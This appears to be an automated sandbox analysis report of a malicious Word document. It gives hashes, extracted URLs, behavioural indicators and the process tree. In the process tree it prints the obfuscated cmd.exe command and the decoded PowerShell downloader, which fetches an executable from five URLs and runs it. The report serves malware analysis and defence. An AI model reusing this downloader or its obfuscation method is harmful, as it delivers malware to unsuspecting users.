Analysis
-
max time kernel
144s -
max time network
170s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 00:37
Static task
static1
Behavioral task
behavioral1
Sample
ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4.doc
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4.doc
Resource
win10v2004-20220414-en
General
-
Target
ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4.doc
-
Size
141KB
-
MD5
d2cc5525e1d27ab1814bf89562efd8d9
-
SHA1
278d0e253423ba2e83f1b3851465251c209a8580
-
SHA256
ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4
-
SHA512
59725072fd48b6853e938ad289b8fe893fa48f61a0a0f5e3c377ba85f63514b55577b78e6bf7a3bd32b8d46a5f400805b64dd51965ed431f76a2d19a46a01191
Malware Config
Extracted
http://www.niteshagrico.com/z7ISltpB
http://www.tenmiengiarenhat.com/bIfcRi8Kc
http://www.hopeintlschool.org/ebIV1do
http://www.dnenes.com.mx/Wmv9Lwru
http://kynangtuhoc.com/h6pTDOH
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1600 3064 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 51 1856 powershell.exe 59 1856 powershell.exe 60 1856 powershell.exe 65 1856 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3064 WINWORD.EXE 3064 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1856 powershell.exe 1856 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1856 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid process 3064 WINWORD.EXE 3064 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3064 WINWORD.EXE 3064 WINWORD.EXE 3064 WINWORD.EXE 3064 WINWORD.EXE 3064 WINWORD.EXE 3064 WINWORD.EXE 3064 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WINWORD.EXEcmd.execmd.execmd.exedescription pid process target process PID 3064 wrote to memory of 2672 3064 WINWORD.EXE splwow64.exe PID 3064 wrote to memory of 2672 3064 WINWORD.EXE splwow64.exe PID 3064 wrote to memory of 1600 3064 WINWORD.EXE cmd.exe PID 3064 wrote to memory of 1600 3064 WINWORD.EXE cmd.exe PID 1600 wrote to memory of 1540 1600 cmd.exe cmd.exe PID 1600 wrote to memory of 1540 1600 cmd.exe cmd.exe PID 1540 wrote to memory of 2684 1540 cmd.exe cmd.exe PID 1540 wrote to memory of 2684 1540 cmd.exe cmd.exe PID 1540 wrote to memory of 4044 1540 cmd.exe cmd.exe PID 1540 wrote to memory of 4044 1540 cmd.exe cmd.exe PID 4044 wrote to memory of 1856 4044 cmd.exe powershell.exe PID 4044 wrote to memory of 1856 4044 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ab37d198e0a1aa5ea37a6a4ebfccf8f6f175f3e97f77261b9a4813a4c7e2c1c4.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2% /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p [O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres? unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres? unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p [O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres? unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres? unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO %3fr% "4⤵
-
C:\Windows\system32\cmd.execmD4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $onlinewt='moderatorvr';$InvestmentAccountos=new-object Net.WebClient;$Ergonomicvs='http://www.niteshagrico.com/z7ISltpB@http://www.tenmiengiarenhat.com/bIfcRi8Kc@http://www.hopeintlschool.org/ebIV1do@http://www.dnenes.com.mx/Wmv9Lwru@http://kynangtuhoc.com/h6pTDOH'.Split('@');$GroceryAutomotiveAutomotivews='ROIso';$SmallFreshTunaaj = '224';$MoneyMarketAccountir='plugandplaywz';$HeardIslandandMcDonaldIslandski=$env:public+'\'+$SmallFreshTunaaj+'.exe';foreach($depositpq in $Ergonomicvs){try{$InvestmentAccountos.DownloadFile($depositpq, $HeardIslandandMcDonaldIslandski);$generatingjk='initiativeshi';If ((Get-Item $HeardIslandandMcDonaldIslandski).length -ge 80000) {Invoke-Item $HeardIslandandMcDonaldIslandski;$PersonalLoanAccountrf='Automotivevz';break;}}catch{}}$paradigmsdc='IncredibleConcreteKeyboardal';5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1540-140-0x0000000000000000-mapping.dmp
-
memory/1600-139-0x0000000000000000-mapping.dmp
-
memory/1856-145-0x00007FF831E70000-0x00007FF832931000-memory.dmpFilesize
10.8MB
-
memory/1856-144-0x000001E0DE790000-0x000001E0DE7B2000-memory.dmpFilesize
136KB
-
memory/1856-143-0x0000000000000000-mapping.dmp
-
memory/2672-137-0x0000000000000000-mapping.dmp
-
memory/2684-141-0x0000000000000000-mapping.dmp
-
memory/3064-135-0x00007FF81B520000-0x00007FF81B530000-memory.dmpFilesize
64KB
-
memory/3064-138-0x0000020629EB0000-0x0000020629EB4000-memory.dmpFilesize
16KB
-
memory/3064-132-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/3064-131-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/3064-133-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/3064-136-0x00007FF81B520000-0x00007FF81B530000-memory.dmpFilesize
64KB
-
memory/3064-134-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/3064-130-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/3064-147-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/3064-148-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/3064-149-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/3064-150-0x00007FF81D730000-0x00007FF81D740000-memory.dmpFilesize
64KB
-
memory/4044-142-0x0000000000000000-mapping.dmp